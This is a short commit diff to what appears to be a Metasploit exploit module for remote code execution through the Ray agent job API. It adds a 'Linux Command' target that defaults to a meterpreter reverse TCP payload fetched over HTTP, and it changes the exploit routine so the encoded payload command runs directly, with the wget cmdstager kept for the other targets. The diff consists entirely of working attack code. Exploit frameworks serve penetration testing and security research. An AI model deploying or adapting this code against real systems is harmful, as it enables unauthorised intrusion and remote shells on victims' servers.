Use Fetch Payload (Not tested)

Takahiro-Yoko · Takahiro-Yoko · commit 64bdf54bb07e · 2024-08-20T08:56:05.000+09:00
diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb
@@ -38,7 +38,14 @@ def initialize(info = {})
         'Targets' => [
           [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
-          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ]
+          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2023-11-15',
@@ -99,7 +106,12 @@ def exploit
     if @job_data
       print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")
     end
-    execute_cmdstager({ flavor: :wget })
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager({ flavor: :wget })
+    end
   end
 
   def execute_command(cmd, _opts = {})
